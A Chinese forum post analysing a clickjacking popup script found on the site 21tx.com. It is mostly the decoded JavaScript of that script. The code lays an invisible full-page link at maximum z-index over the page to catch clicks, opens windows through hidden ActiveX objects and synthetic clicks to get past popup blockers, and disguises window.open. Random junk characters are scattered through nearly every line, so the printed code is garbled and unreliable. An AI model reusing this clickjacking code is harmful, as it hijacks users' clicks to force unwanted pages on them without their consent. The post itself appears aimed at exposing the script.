天星网ClickJacking点击劫持分析
9 l- i' M; L: P7 qhttp://www.21tx.com/ 天星网
4 p P# m, E5 r1 ~我得联系联系作者
. `1 b. ~& ?6 Z" c# ]0 ~刚好打开这个站,发现第一次点击会弹窗,然后就不会,清除下COOKIE,又继续了,然后查看源代码,也没什么奇葩的。( |" c( j E' [; G
http://www.lxting.com/script/popup/v1_min.js
, |% i0 b a( h& p3 f$ X- \! k& Q& F/ g I3 X
这个是锁定到底JS脚本,
7 s, Y4 K+ e$ K X2 w( n( P+ U解密后的代码- (function() { / Z2 U$ b0 m& R* |% l
- var aa_url = window.ytpp_url; . ]; g3 ^& I* I
- var ua = navigator.userAgent;
7 J6 U* C# b; O - var form_div = document.createElement('div');
0 n, r5 h8 ?; v1 o6 w4 f. Z - var form_pd = 0;
8 R5 L$ |( {7 T) F' b# y+ `4 O, A - var browser = {
5 X. G1 E8 z8 Z - ie: /msie/i.test(ua), ) H. J. h3 e6 P9 {+ ]7 W# Z; t$ i
- ie6: /msie 6/i.test(ua), 9 E; J @- C. C+ q
- ie7: /msie 7/i.test(ua),
+ R' o- m6 h, r G5 Q - ie8: /msie 8/i.test(ua), & }$ E% n, ^: Z5 Y( Y
- ie9: /msie 9/i.test(ua), $ x! N, L3 {! u, o( \
- 360 : /360se/i.test(ua),
$ q8 b: `" k6 w - sogou: /;?se.+?MetaSr/i.test(ua), ) o' I3 A$ \) X4 ]
- maxthon: /Maxthon/i.test(ua),
1 f x, |$ k+ w1 U - tt: /TencentTraveler/i.test(ua),
! q, m+ e7 w$ d6 Q# \ - ff: /firefox/i.test(ua), 1 x6 e) p: O- @: r4 l" e1 S
- webkit: /AppleWebKit/i.test(ua), 3 U1 S: Y0 L+ r& J3 k" @9 d$ N0 l
- opera: /Opera/i.test(ua),
1 X/ R9 l" Y: n' m* F* { - qqbrowser: /QQBrowser/i.test(ua),
. ?6 B9 A' D$ K" ?, Y) N7 {; v" d - cr: /chrome/i.test(ua),
6 c9 w2 L e! w - gg: window.chrome,
! h8 c9 {: d$ R2 s* \ - theworld: /Theworld/i.test(ua) % w9 }0 _+ J ~, Y2 ^8 I/ @0 @2 f
- };
! J/ B% B2 X' ~( F - var _setting = "";
/ ], c% W! Z. K @: M2 e1 V. w - var _ct = 0; 4 o/ C2 {3 t$ J( ]" |' E
- var _le = 0;
$ e; e& ^, R, N) y% r0 M M6 z - var _pd = 1;
1 A4 M3 e* O3 q1 Y# q' J% ?* P - var _pd2 = 0;
" V# m/ O. j0 H- m - var _pc = 1;
7 _+ ?* P! n, G z. _9 b; a - var _pc2 = 1; " u* ~1 b8 u3 r! Y3 G
- var _pco = 0; & ~' w, Z7 `2 j
- var _pta = 0; 5 N l+ ~# V; Q( E2 t
- var _ptb = 0; + B9 F6 T, J" p
- var _pt2a = 0;
& E( h5 j* H2 X$ q - var _pt2b = 0;
9 T2 v- U" Y7 o" ?' E o - var _pt3a = 0;
4 U, y7 B% f5 q* }6 Y8 u - var _pt3b = 0; 9 g( z* y( `0 I( A
- var _pt4a = 0;
, x, R, n8 u+ E t) Y - var _pt4b = 0; & [2 \* n/ g: U# ]
- var _pt5a = 0; 0 u! B! U c. {* \$ j% {3 K
- var _pt5b = 0; 9 p- R' ^' f6 H4 |5 a
- var _pt6a = 0;
2 ~; s: J8 i( K, ` - var _pt6b = 0; 1 O, n& y R: A
- var _pt7a = 0; 7 O5 ~( u) ?: J F( E) J
- var _pt7b = 0;
- K2 V+ c7 [4 b( } - var _pt8a = 0; . S+ f6 }; b: x; B5 H, ~
- var _pt8b = 0;
& m; k; f0 z0 ?" N7 ` - var _pt9a = 0; 1 G- q" q2 f0 l; A" D# t8 T
- var _pt9b = 0;
' \4 i9 f& `, t0 \! M; b9 D - var _pt10a = 0; : A7 j" o: _. i! ?+ s% z# w
- var _pt10b = 0;
8 M" e* Q6 m- b; B9 s6 f - var _po = 0; , \5 m8 A) u, u+ c( d5 y
- var _poo = 0;
5 d4 }" y c* F6 ~6 m - var ckn, ckt; $ _3 L# _! v' Q! F' M1 V9 n1 d2 @
- var ads = 0; 4 L. {4 c+ _/ Z7 c; @, t
- function b(w) { , Y$ B8 I# P2 v! a6 `
- var s = w + "=";
- |4 g2 K- ], e9 o! ] - var r = ""; 0 \# ~. G2 E1 C* _" z9 l5 ?/ v) D# H
- var o = 0;
0 p, W( T: t' n6 q) p - var d = 0;
) B. K4 M5 Q, n3 O- U - var p = document.cookie; ) L7 s3 e, c: p. X% Y' }2 t
- if (document.cookie.length > 0) { & U [4 N) `7 Z5 ~# A, P& K; L
- o = document.cookie.indexOf(s); - g) A; t: ?) ^% v* z5 k
- if (o != -1) { & t l+ ~/ V3 J- b6 N
- o += s.length;
, ? C/ a+ z. i7 } - d = document.cookie.indexOf(";", o);
# m/ m5 e/ h0 z7 j( w2 a - if (d == -1) d = document.cookie.length;
+ j q) n$ d0 K2 M1 c1 k - r = unescape(document.cookie.substring(o, d))
9 Y+ f4 z+ W+ l* ]* W' _ - }
' \; V8 L& c( F- C0 _0 `7 J/ j - } " i/ _# J" G6 N* o8 C( z
- return r ) I9 f' o/ ]2 |" [2 ]; H
- };
5 m2 S$ g1 l' K" P0 t0 I - function p(w, p, v) { ]2 n; i6 D' M1 y! j
- var t = 30; 5 ?9 n5 f2 W2 `$ g5 I
- try { 1 q8 N7 Z( j) C5 H, O6 D9 R3 v0 s
- t = parseFloat(p) * 1
- p" o- Z7 B( V0 ]$ x - } catch(e) {
- M7 H' x: ]% j$ i! V- Y - t = 30
1 g( q) x( a o5 S - } % v/ Z8 T& w7 Y, U
- if (isNaN(t)) t = 30; 5 b8 h- l: x) {7 P1 L% C
- var then = new Date();
. `1 [" b# H/ t, a - then.setTime(then.getTime() + t * 60 * 1000); , {% ^8 _; W5 j1 s
- document.cookie = w + '=' + v + ';expires=' + then.toGMTString() + ';path=/;'0 V6 W: ]- J/ M# I7 Z7 T9 Y+ D! k* N
- };
- w w6 E& |% b: @ - function init() {
6 s' D' q5 _$ S$ b - _setting = ytpp_sti; 6 K0 {+ [, q/ p3 y8 h
- if (getp(_setting, "CT")) { $ t' ?" b) I- B) E0 J; [ t
- _ct = getp(_setting, "CT")
6 C* i. Z+ q4 i; O7 C6 m - }
8 U+ i L v! p - if (getp(_setting, "LE")) {
0 N' a, C- c) A8 Y3 Q g - _le = getp(_setting, "LE")
, }+ j( B6 `8 o6 O' j - } * O: K4 x4 _ z9 j7 V
- if (getp(_setting, "PD2")) {
+ \6 C! S% Q/ E; Q' ^. F - _pd2 = getp(_setting, "PD2") , J+ m. v+ y8 {
- } # m7 H' o6 k$ n; [
- if (getp(_setting, "PC2")) {
+ x# @: a2 o; M" i$ w' R$ L - _pc2 = getp(_setting, "PC2")
, n5 q& i$ ]& s# L, U; E1 L; b - } " x& X8 E! O: U, O3 P$ i
- if (getp(_setting, "PCO")) { 3 o0 D7 g& x' l! e g
- _pco = getp(_setting, "PCO") 2 z0 F5 J3 y3 F+ ^
- } $ y! L# X' A- |- L+ o/ ~! Y+ U
- for (var i = 1; i <= 10; i++) {
: G6 w/ u& c( z - var n = i == 1 ? "": i; 8 q( Q* G/ @, S0 W" b2 }
- if (getp(_setting, "PT" + n)) {
/ `9 F" t$ z& ]: C3 [% e$ y1 K - eval("var _pt" + n + " = getp(_setting, 'PT" + n + "').split(',');");
) `- N0 W3 v; O! g - eval("_pt" + n + "a = _pt" + n + "[0];"); ' R" W* T. C# @$ ~% o/ {
- eval("_pt" + n + "b = _pt" + n + "[1];") ! d* ~6 I" A4 }9 P+ s% v7 t! @" N6 o
- } 5 l8 v7 j0 B& B0 T- |* r+ h
- } * e6 _" T" b3 u
- if (getp(_setting, "PO")) {
3 H/ x4 X1 G' L9 f8 M+ E - _po = getp(_setting, "PO") 9 L S7 \. j3 S) ~% `
- }
" `7 c ^; L9 j9 Z7 Y7 n - if (getp(_setting, "POO")) {
4 f. Q7 h1 s: t* ? - _poo = getp(_setting, "POO")
8 i3 t3 @3 r$ t* n" ~ - }
; ]- I1 Q5 g: f. }2 t - if (_pco == 1 || _poo == 1) {
* p& r8 C* s( M. a+ s9 W: q3 {9 H - if (_poo == 1) {
; j& K) M2 l# Q \ - _pco = 0 5 L; [" j9 U& P/ h6 B5 L
- } else { - M6 j5 |+ c( [
- _poo = 0 3 b4 K. L* N$ I. T, `: [
- }
0 H' M1 z* X1 e7 r5 H1 F - _pd = _pd2 = _pc = _pc2 = _po = _pta = _ptb = 0;
' h8 l5 Z- _' w& ` - for (var i = 2; i <= 10; i++) {
* M2 p T% T8 [: _2 @ - eval("_pt" + i + "a = _pt" + i + "b = 0;") ' n7 v, v% a0 p+ ?
- }
; A. I( s6 b5 W0 f0 s - } 9 P5 E6 C, S! d
- };
9 q; n6 G: y# ^ - function getp(s, p) {
8 m7 A7 @5 e1 t+ T+ u* i - var i = s.indexOf(p + ":"); 0 i5 N4 W$ v4 W2 {+ e$ r1 D$ f
- if (i >= 0) {
9 i: D% f5 J; d/ Z. h - return s.substr(i + p.length + 1, s.substr(i).indexOf(";") - p.length - 1)
# C: Y0 i- U8 g2 L2 ?7 Y* t - }
! B6 P! V& z. m1 V - };
9 \, |' s& u/ W - function event(e, event, func, act) {
% a! ~2 U( H0 v1 L: W - if (browser.ie) e[act === undefined ? 'attachEvent': 'detachEvent']('on' + event, func); i0 ]2 P( q i3 I. {) A' n) r
- else e[act === undefined ? 'addEventListener': 'removeEventListener'](event, func, false)
1 Q, K6 x% k# y% a$ N; t - }
) i& g0 Z3 K* |) w! y% o* F# i( X+ t - function pop(url, param) {
+ a0 s3 D/ F( O' w% S/ q - if (!document.body) { % G' x2 D) P* D
- return setTimeout(function() {
2 V" m/ W& }0 q, I% D6 V/ A+ K - pop(url, param)
* ?$ ^0 k% @4 ^# P: v - }, 5 B- W6 |- J. O2 S# _+ ^
- 13)
~' ?; {; O- b C# B - } + B% D$ r' y- z' O, a
- try { 0 a% l% B+ @1 N! R9 T' k
- if (browser['cr'] && browser['gg']) { + e$ D' q& b, Y+ W
- try {
/ h; \0 ^$ C( O; U3 X& F3 R - hrefopen(url)
0 }5 S% Y: e4 q, }1 z, A( W - } catch(e) {
+ u/ d+ n4 c/ s8 ? - a_pop(url) , Q7 V$ o; G1 ~- Z6 K1 `
- }
- o" ?0 Q+ V1 j5 P, Z8 k8 u - } else if (browser['webkit'] && browser['maxthon']) { : K) G k7 K8 u# J% k) M( C
- if (!func(url)) { " u0 E- Z+ |" y8 H- [
- try {
1 h3 ^' ]! Z- s! d* A - form_pop(url); 3 J% b$ @* O/ J. G
- a_pop(url)
) M6 v0 K8 z$ I3 G! S) W - } catch(e) {} " _1 u6 q4 Y( }! n% H7 g& _
- }
" e* g, a& s* w( O, C# a( r: i o4 e. D$ o - } else if (browser['tt']) { 6 w/ F% x* j$ T2 L q, \1 _
- try { ' ~, F0 b/ c* s2 B
- object_pop(url)
+ j# t; X1 a$ F- ^* Z1 l - } catch(e) { ) R- r; p9 ^3 Q
- a_pop(url)
% }4 l. t9 t! J* Y9 H - } / I9 U$ L3 h5 x8 A) k" d
- } else if (browser['sogou']) {
* k5 w+ w' o# c2 G/ r - if (!func(url)) { ' f6 _5 |3 B5 l* C. ` Z- A; m
- try {
' i) \9 t3 o4 [8 e! r+ @% \ - a_pop(url)
- c) P/ g7 n: N) u* ^ - } catch(e) {} 6 K6 m) X9 f/ c& `) {
- } 0 D3 }9 O, s! a/ |% s+ m
- } else if (browser['webkit'] && browser['qqbrowser']) {
6 M5 y1 O5 @5 ]' A8 R9 x - if (!func(url)) { 9 I8 v/ @# k& {7 k! D
- try { 5 g' l6 a% _, M! [- C
- form_pop(url)
( F J+ m- Y2 P - } catch(e) { : P" B" m9 Y* C3 x
- click_pop(url)
+ Z& T7 Z3 H! W9 ~8 g - } : k; Z G- h3 V F
- } . b z+ ?% G5 M3 ]4 z+ z
- } else if (browser['webkit'] || browser['opera']) {
" D& o* D$ f& n& W, r. W - try {
0 [" h8 A" Q s# w8 b - form_pop(url);
1 }1 \: u7 E' S; \6 }4 ]4 o+ I - a_pop(url) " O- j4 r g, L& @
- } catch(e) {}
! {$ a; o5 A5 ^, x* J! m) c - } else if (browser['theworld'] && browser.ie6) {
& X" m4 f! u4 |' I$ Z8 E - if (!object_pop2(url)) {
9 |, {' W8 D o: b+ P8 z0 G! o. U - a_pop(url)
) d, u+ t) F! p - } 0 n; l8 }; r* p3 q, T. E
- } else if (browser['theworld'] && browser.ie8) {
# T# K( g: Q p- z+ C. W - if (!func(url)) {
, Y2 A- s4 b) k3 q - try {
% B2 }. S0 p! W6 J5 i2 B - object_pop(url)
" ~8 D" F% t1 m! E @; D- Q/ b - } catch(e) { & x5 }! N4 k% W( W# x: m! U
- click_pop(url)
$ C, `: B* l! l+ `' O5 k& U - } - S+ \" ~3 b* l1 s5 j) C
- } ! i X# f+ O' ?
- } else if (browser.ie6) { - X& b, i- U# Q( m; }9 v) n# c
- if (!func(url)) {
9 A E( g7 K/ \# E% x* I; `9 j - object_pop2(url)
9 k- I1 P$ I! \" B9 B - } 1 C, C" F$ V3 e, x& }8 a
- } else if (browser.ie8) { 9 F# L$ z8 y& @$ t
- if (!func(url)) {
; g; A B, ]3 L# {& R7 ~/ h! D - try { 0 M" B' b- K# k! O ~* w) b
- object_pop(url) 9 ]2 G& F, {9 [/ v
- } catch(e) { 8 z4 [ i3 s" ?0 t6 b! f8 P
- document.onclick = function() { 0 g7 @2 M1 Z& m/ Y3 }! ^
- func(url);
) P8 Q& F0 D2 n* O4 b. A - document.onclick = null8 n3 D) ]* o7 a0 I1 N! Q( [. `
- } 7 L- \0 `5 Z% n" s; M
- }
- _3 s& }) R* K$ z3 g; W! c6 ^7 _" j - } 2 B" k. G* d2 L0 x. u# i7 _. ?
- } else if (browser['ie']) { * [" }3 i0 d" a0 D# U, s% W" E
- try { 8 L9 k3 C/ N; h9 r" {4 F
- object_pop(url)
2 o3 d( a( @/ u( E, ^ - } catch(e) {
/ y8 W [8 l9 ` - click_pop(url)
: _: Q3 P }8 r( I - } : }+ {. W- Y7 h0 R, P9 j7 C
- } else if (browser['ff']) {
5 o: k* A A5 A ] - if (!func(url)) {
+ m3 u/ _+ m/ F" a$ O - click_pop(url) # R1 h& e3 {9 J
- } / e5 o+ u, }+ W( U& e$ L3 G! ]( Z
- } else { 9 y- x$ t5 i( F; Z3 H+ j
- if (!func(url)) { 0 T3 n* z# A1 K! @3 G8 Z9 ]
- click_pop(url) . p/ U( @( K. a @' Q1 s
- } & E9 M6 {& I. d! d: d% Y6 y+ [
- }
2 z- L6 x. r/ v4 A$ E8 x% | - } catch(e) {
$ |0 \- u0 w1 k8 K6 G - if (browser.ie7 || browser.ie8 || browser.ie9 || browser['qqbrowser']) { $ n( ^- L4 g1 E3 _' d7 C% L
- click_pop(url)
" T$ h# E, `7 S. O - } else {
4 M u: P; j5 M. W - a_pop(url) 4 `6 x) } X' m
- }
4 c7 v% j/ f& S/ {1 L3 { - } 8 _/ `. G7 b% J4 { Y; t& D
- } 6 m% |0 e0 P6 V( D! g8 C2 H
- function object_pop(url, param) { . A; J# w1 r( t. U* ^
- var object = document.createElement('object');
3 i+ `( a( H1 @ - object.setAttribute('classid', 'CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6'); `$ k# w3 w$ m5 p# d
- object.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;'; . ?; l) M) c6 g: X5 r
- append(object);
: C! s4 c, i9 L) D - object.launchURL(url); 3 I, k, w, M: D, Z! g8 M
- ads++; b7 v7 t% H; f; v
- p(ckn, ckt, ads)
( q7 \' t. ]2 N4 ^ q - } & ?! X+ B7 ~' @% t |
- function object_pop2(url, param) {
* T- G, s# V, k3 h - var object2 = document.createElement('object');
/ E" d3 _2 W& L. K5 U - object2.setAttribute('classid', 'clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A'); J& `( F3 B+ S$ S4 m
- object2.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;'; + Z" k* _" S0 ~0 c: x7 N% G
- append(object2);
$ H8 m# o% x8 f5 h9 t - for (var i in object2) { / _2 y7 m, e9 G( P( A+ g$ N
- try { (function(o) {})(object2[i])
+ J/ Y2 |' K# ~: u# O - } catch(e) {}
# N: i' F6 }$ P$ o$ o - } & R. f, S G; M1 S( P( C
- setTimeout(function() { , F, L! ?* d* p% r" d/ {' ^
- object2.DOM.Script.open(url, '_blank', '') + M/ a# L" a: O+ w% Q* N
- },
( c) ?( @4 J* `( b; f/ w - 500);
+ i6 f+ x0 p4 \$ \: P( v" b- X - ads++;
/ o# ]# y% A+ z, o |4 |0 S/ b7 K - p(ckn, ckt, ads)
) a# ^ ^2 E$ O2 A - } 6 K: d% y) _- u$ n- ]
- function append(e) { 2 \( i# _: ` X A" ?3 `; K7 `
- for (var t in {
, x( S& t7 W. v4 ~# e# I - body: 1 8 L* P, ~* \; J+ ?+ u& _
- }) {
( I, d4 R( j! L. B, E0 Z/ q - var ele = document.getElementsByTagName(t); / r- c0 l& n9 }& B. ^3 |9 l6 j
- for (var i = 0; i < ele.length; i++) {
8 `3 J( T$ j4 `3 A) y - ele[i].insertBefore(e, ele[i].firstChild);
* N" J; K0 _. w6 |2 A: M - return
) e; \8 y- L1 M% p - }
7 Y( X; t* a; @: g. b. D - }
' r# S' H9 d. h4 |" W - } $ I4 r }- c; x X0 u$ R: D
- function hrefopen(url) { - T6 K2 w: F7 C. Y& W1 U3 K
- try {
" X% _% G# W8 q2 K7 \! A; s - var c = document.createElement("a"); 1 i( d+ S; Z" G0 Q% K
- c.setAttribute("href", url); 3 {. @" \8 H4 k2 P& f
- c.setAttribute("target", "_blank"); . s0 F& ~5 l F
- c.setAttribute("style", "display:none;"); : ^7 e z: D- h8 v1 o7 ?' z* r4 N
- var b = document.createEvent("MouseEvents");
8 m: p( U. ]6 _5 r6 ? - b.initMouseEvent("click", false, false, window, 0, 0, 0, 0, 0, true, false, false, false, 0, null); , c' d8 m; I( _; G. O! `( E; S. U
- c.dispatchEvent(b);
* I% n9 @: ?( ~3 g2 t - ads++;
/ a6 H3 s7 w O# c9 q- V - p(ckn, ckt, ads);
- s" [. X7 n* `+ ^ - return true
4 ?% ?* S0 L; L* u7 f7 d' \ - } catch(q) {
' o8 P z! r+ s- \4 K" ]* G - return false1 H9 |/ I' o, T3 a
- }
3 {% ]) Q( D% C - } ) p2 C' r5 c. G' Z+ f
- function form_pop(url) {
" j/ ?8 v* Q& o9 \# y - form_div.setAttribute('id', '__unionsky_push_d_object_box__');
5 S8 C6 @& J/ q+ U' N7 L/ s - form_div.setAttribute('style', 'display:none');
( X+ S3 G4 L4 ]# ]* } - var form = document.createElement('form'); 1 h7 k% z; ? j
- form.setAttribute('action', aa_url);
9 T& j. q9 P M' M f8 q$ O2 P - form.setAttribute('method', 'post'); * t W! c% A! c1 W
- form.setAttribute('name', '__unionsky_push_d_form_box__');
. |2 \- k$ P) ?. O - form.setAttribute('target', '_blank');
1 n- w$ H/ F3 n - form.setAttribute('style', 'display:none');
9 m0 o4 D& J: q: B$ R& f, t# m - var sinput = document.createElement('input');
6 |. A3 E6 q/ W- ^) X) A - sinput.setAttribute('style', 'display:none'); 6 O9 Q# y( R+ _" j1 s) {, s( g
- sinput.setAttribute('type', 'submit'); , E6 X( _3 ~9 [7 l$ p; [# u# ]
- sinput.setAttribute('id', '_sumit_2app'); 1 Y$ ~, ^7 a% D. t
- form.appendChild(sinput); 5 s. B7 Z' ~2 r9 {/ A% e
- form_div.appendChild(form); t9 H- e% s- k# e/ y, s
- append(form_div);
. O( {1 r l' m1 T - var unionsky_from = document.forms["__unionsky_push_d_form_box__"]; 1 b/ ]$ g, F& S9 E
- try { ! [8 j9 h" |5 S
- document.getElementById("_sumit_2app").click() # R. K- s. Q1 C! I) V, o
- } catch(e) { 3 N l, K: W" m" X- o
- event(document, 'keyup',
2 k! J/ V5 k9 m' B& P8 w - function(e) {
' a3 S0 }) A6 J5 U- Y. x - if (document.getElementById('__unionsky_push_d_object_box__') == null) {
" n' w7 _, n' n3 f - return
: e" E4 v; ?# o" D - }; Z0 ]) W1 y1 U3 q, T) C+ l
- e = e || window.event;
1 ~" Z/ n) x$ }; ~& s. B - e.canceBubble = true; 4 l2 k- P, ~( h! W R
- event(document, 'keyup', arguments.callee, true); / s( l' s1 @! F O* d
- form_pd = 1; 0 ?& C! f0 q- x/ K! V
- unionsky_from.submit() ! k& {7 G( t1 o9 Q6 H3 Z/ U1 f& J* f4 k
- })
( a2 G6 P: L$ i$ [ h9 r - } + }6 z/ `5 t$ B$ F/ E' W
- };
5 ?3 F/ r- K6 v2 s3 H8 w - function click_pop(url, param) {
- D# c$ O6 ]/ [5 ^( ~2 d' h - event(document, 'mouseup',
' t/ T( ^+ j7 h - function(e) { 4 W6 P9 \* j6 ^, h5 C2 H) z7 q, O
- e = e || window.event;
0 v/ W4 f: @, ]5 Z - e.canceBubble = true; : _. V k4 l" C5 X0 u( \$ b( E
- event(document, 'mouseup', arguments.callee, true);
* l7 @$ k S5 T5 ?: L( n' N& i% N - func(url, param); d3 I$ f% A) Q0 V
- ads++; ) @, X& {7 ~: m* |6 S1 B& N+ z! @
- p(ckn, ckt, ads) % k: Q% U+ w8 N
- }) u5 g9 }1 ^* u& ~# Q' G0 }
- }; ' S, x# c {$ v5 A$ h0 f" j
- function a_pop(url) { " U; M: q, b+ E
- if (ytpp_plid == 166028) { % `1 d: Y4 _$ e7 q3 o, z
- return
3 O7 K3 Q% a6 N4 T( N* T# I - } , w: @4 H! [1 V% N; u
- if (!document.body) { 9 l6 @! ]; Y. t
- return setTimeout(function() {
' u6 T) H( H2 G+ L! t1 l* r - a_pop(url) 6 X& Z- R5 _5 y, O, X! J5 W+ @
- },
0 _& R# \' ]& A5 t - 13) 3 W- ~. N4 W7 ]) x! ]* _+ O
- }
# M( H! h( ^" p( T7 P$ R/ V - var a = document.createElement("a"); 4 _: Y' ^5 P' a1 @- O
- a.href = url; ' ~" T; W2 z9 b8 W; \) x" l6 ]
- a.target = "_blank";
& Y9 f y1 k9 f* E - var div = document.createElement('div'); ! n# x. ]4 d' ~& n) R) x# D
- div.style.backgroundColor = '#fff';
" g) T% b! _+ O9 w" |$ X. F% t - a.appendChild(div);
+ ~ P+ U2 t8 R" e - append(a);
0 N/ [& z0 C, S+ {5 e7 ` - var as = a.style; ! T8 i% C; I& H' s3 i
- as.position = "absolute"; ) R7 r& f+ c( k0 k
- as.zIndex = '2147483647';
8 c; `0 e/ F2 u: z$ g/ a - as.display = "block"; & ~5 B/ Q+ r" Q+ ` k: {6 ?
- as.top = "0px";
: k: H0 W, x* Q5 n- Z - as.left = "0px"; ! ?7 c! C$ C3 R: [7 [8 m
- as.cursor = 'default';
& G' p, T) J# `' f8 ?# w- E - as.opacity = "0";
7 L; W' V. D8 d) @2 R! X2 d - as.filter = "alpha(opacity:0)"; 2 Q: n+ N" o; r( g6 Q. g
- var m = setInterval(function() {
3 R# o/ y' z, p4 F- O: [ - if (form_pd == 1) {
0 @+ z) {4 f6 Z8 l/ }6 B$ A - a.parentNode.removeChild(a); * ~$ b) F: W2 \2 `* o
- clearInterval(m);
5 l2 k4 s) [7 c: | - return5 Q7 X& u6 u% O' N2 l: f3 |* P& |
- } . v1 U. k2 Q C. X7 z; m
- a.style.zIndex = '2147483647'; 8 C" l5 f. ~. N4 Q) J
- var d = (document.compatMode.toLowerCase() == 'css1compat') ? document.documentElement: document.body; ' l# N( A l1 m% C8 h
- a.style.top = Math.max(document.documentElement.scrollTop, document.body.scrollTop) + 'px'; ' t0 e- Q9 d- v$ W0 s. s
- div.style.width = Math.min(d.clientWidth, d.scrollWidth) + 'px';
$ I9 j1 N; G) F# X% L$ I9 ?( \ - div.style.height = d.clientHeight + 'px';
6 @6 Y+ C5 r; F3 B$ h# O8 ^ - if (browser['ie']) { 7 M0 `% r+ L; N
- try {
; K% c0 j8 `9 ]8 e& }. ]1 h - var divs = document.body.childNodes; & H+ g/ u5 y3 B `3 L
- for (var i = 0; i < divs.length; i++) {
2 v/ w7 y c) ]* I' a- { - if (!divs[i]['style']) { y& K) D* F w9 v4 t7 e' ^5 O& {
- continue% y/ T1 n/ H- V9 h: r
- } 0 s, y+ P N5 S1 q8 ^' q- i# J
- var _i = parseInt(divs[i].style.zIndex); ?! K& `0 `" @- S
- if (_i && divs[i] != a && _i == 2147483647) { : O& Q* L$ q" p4 L* `
- divs[i].style.zIndex = _i - 1 % c: R& a, w) \6 ^( ?
- }
2 P7 _6 d6 x1 q* u - }
8 ]$ [. r- N+ O1 L& L# O - a.style.zIndex = '2147483647'
2 _9 z' A1 R* W6 [" s2 C - } catch(e) {} $ g8 A: x2 m4 C u
- }
0 W: M4 b; F2 C - },
1 T" c, }/ Y3 m" l/ e ~ - 120);
# {1 b3 u' y" e - a.onclick = function(e) { ) p' b& B6 E: Y- ?
- if (document.getElementById('__unionsky_push_d_object_box__') != null) {
7 P& \) W/ X3 n# P( y - form_div.parentNode.removeChild(form_div) 0 f/ v" J, L6 z% U
- }
7 z7 P- @$ r9 j - e = e || window.event; # _6 a6 D" N4 i# i
- e.cancelBubble = true;
! i6 Y# }2 m6 r0 Q" b6 t - setTimeout(function() { & G/ F0 s8 ?1 t
- a.parentNode.removeChild(a) o, D( x) L1 C. [, @! g
- },
* X; C f' Z d( E6 e - 200); 1 v6 r! v& N% y. L0 l- [
- clearInterval(m); # S0 j: Q2 `) I, V4 a
- ads++; 5 R/ u1 O2 s0 Q9 P! H9 e$ b% y
- p(ckn, ckt, ads)
; o4 w$ c3 e9 H2 V - };
2 r1 \" \8 n8 }" k& ] - event(a, 'mouseup', : e) e( I/ Z& u9 Z0 F" C
- function(e) { + g# y5 W* ~8 U5 d8 [
- e = e || window.event;
# a4 q. }* i2 m6 Y0 n' S - e.cancelBubble = true
9 @3 a1 r3 g- i8 h% w" n. Q - })
1 p5 G& u7 f: s7 x: [: J2 B. ]2 }: N+ X8 ` - }
- M/ g2 @( x8 E7 N( n - function func(url, param) { - t7 N r! c6 G4 D9 K% E' @
- var f = window[String.fromCharCode(111, 112, 101, 110)]; . g3 q1 N. }( ^
- var w = f(url, '_blank', 'left=0,top=0,toolbar=yes,location=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes,width=' + screen.width + ',height=' + screen.height);
* X' y% Z) g5 s7 x1 o1 o n" ~! b9 w - if (w) { , A" K% j2 v+ X0 G
- ads++;
' b* A1 f' R, E7 H F - p(ckn, ckt, ads)
0 W- e, T. v, g: G. p; s - };
, W2 H/ N% k: j: Y5 | - return w ! m1 l: l: q% m' i* v, f1 ~
- }
8 j) ?) J" g Y% n7 { - function fstart(url) {
, o$ K' L! k7 r6 J - init();
9 g: A' V; l% W( F7 Z0 t2 C - if (_ct >= 0) {
% x# d# l0 s2 W, M. ~* G1 B - ckn = "YITIAN_NUM";
* u! g5 j9 ^4 z9 \ - ckt = _ct ; [) K: h( \( `4 M3 H6 a/ U6 F
- } else {
+ v6 X' G6 X& B - ckn = "YITIAN_ALL";
" \) S8 \* g8 C/ D' N6 W - ckt = Math.abs(_ct)
9 b& k/ O8 } u5 l" b - } 0 {7 T1 s4 n, {$ f
- if (ckt > 0) {
1 t7 q1 M: m$ M - if (b(ckn)) {
1 f- g: Y7 W, R: s3 { - try {
6 }4 h6 _6 Y- @2 a _* |( m1 w4 U& Z; O - ads = parseFloat(b(ckn)) * r. U$ m% m1 l# K/ Z. ]! q, v
- } catch(q) {}
4 [2 d$ P, w) l3 l7 N' T/ `7 n - }
7 Z" _0 C% g' ^2 k( W' Q# G - }
! j/ F" R0 m4 u/ |( D% A, W' O - if ((ads > 0 && ckn == 'YITIAN_ALL') || ads >= ytpp_ads) { + q1 N$ J) c0 e9 q
- return/ g! } C6 ?" m; j' D0 J$ y; \
- } else {
/ A/ w* y( W) @" I. i5 y - if (_le > 0) {
; ^1 e7 E- z2 ~ Y# g1 _1 W- q2 R3 c - setTimeout(go(url), _le * 1000)
& N/ i7 j- I! c2 o k - } else {
* W, E4 `! M y, g+ F' | i - go(url) 0 X; Z3 `: _6 ^# b4 {' {7 V( k
- }
" {9 P- J# G% F4 g* E2 S - }
; _2 d% N& F/ {4 P: y( w; u - }
3 h# F& u/ d; `; q: O - function go(url) {
$ q3 s, L' R2 U! F2 ] - if (_poo == 1) {
7 I& z6 T9 @: G4 T6 ]5 }; A& Y - try { ! p2 r3 G8 h! Q6 _
- func(url)
8 t9 M* _1 |' P6 w, o7 b+ F - } catch(q) {}
$ _: u3 j" H" j% @6 c - } else if (_pco == 1) {
/ O) e+ m6 p7 T3 E5 t1 ` m; v - a_pop(url) : t6 y- k/ t( K: M
- } else { : z1 x+ Z* |) @: t4 F. q' V6 S+ f0 S
- if (_pd == 1) { - S9 x! C4 B; J' o J
- setTimeout(function() { 2 o. L: |, s. m( c2 O- a, s. ^
- pop(url, { 4 }% g+ w0 G+ ]7 f5 S% @
- a: 1,
0 a2 m% q% F6 Y9 X0 q% s2 m3 H% U# W - b: 2
; x) y1 e5 A/ {- R( g* U - })
3 |1 K+ I6 V+ S& }. n- j; ` - },
. S+ [' P) l4 z - 300) 6 ]7 Q( ]; p0 y
- } ) @8 H2 w- z: N/ ]
- if (_pd2 > Math.random()) {
7 b1 y: ^# T0 o% T$ e: l' z - setTimeout(function() { % q2 ?3 l. m3 S. K% ~6 v ^
- pop(url, { . I4 b5 |9 v' e3 R9 W/ P
- a: 1, 9 ]: n* P, V- {! }
- b: 2 & I9 b' h6 T- r/ F( _
- })
8 T. h; m. t5 R2 e, ^. ] - }, + [+ J5 N5 M f G8 P( g5 J
- 300) 5 e( c8 E7 ~+ o+ `2 ?! y
